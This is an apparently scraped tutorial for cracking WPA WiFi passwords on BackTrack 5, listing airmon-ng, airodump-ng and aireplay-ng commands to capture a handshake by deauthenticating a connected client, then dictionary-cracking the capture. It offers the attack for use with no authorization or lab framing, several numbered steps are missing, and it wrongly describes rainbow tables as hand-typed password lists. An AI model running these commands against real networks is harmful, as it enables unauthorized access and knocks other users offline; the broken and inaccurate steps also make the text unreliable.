Академический Документы
Профессиональный Документы
Культура Документы
Start backtrack 5
Create pwd.txt file
In that file enter the possible passwords(manually) using the technique Rainbow table
Open the console in backtrack 5
1> airmon-ng
This commands states used interface,chipset and driver
start : to enable
wlan0 : name of the interface(which you have got from previous command)
4> airodump-ng -c channel_num -w hacked --bssid bssid(paste the bssid which you have got)
mon0
(hacked file is created automatically do not create it manually)
5> aireplay-ng -0 0 -a bssid_num(paste the bssid) -c station_num(get it from previous console) mon0
Through this command authentication will take place and then wait for WPA handshake, to
*** For WPA handshake to take place its very necessary that another pc or user should be
browsing interin same WiFi network***
Using this command hacked-01.cap will be opened and it will ask to specify dictionary.(Create
a dictionary for demo with a few passwords at /pentest/passwords/passwords.lst) or create a pwd.txt
with a few passwords.
Using this command packets are read and bssid , essid and Encryption pattern of packets are
displayed.
After this command the process starts which states how many keys are tested and find
current passphrase/key and the process stops after the correct WPA key is found.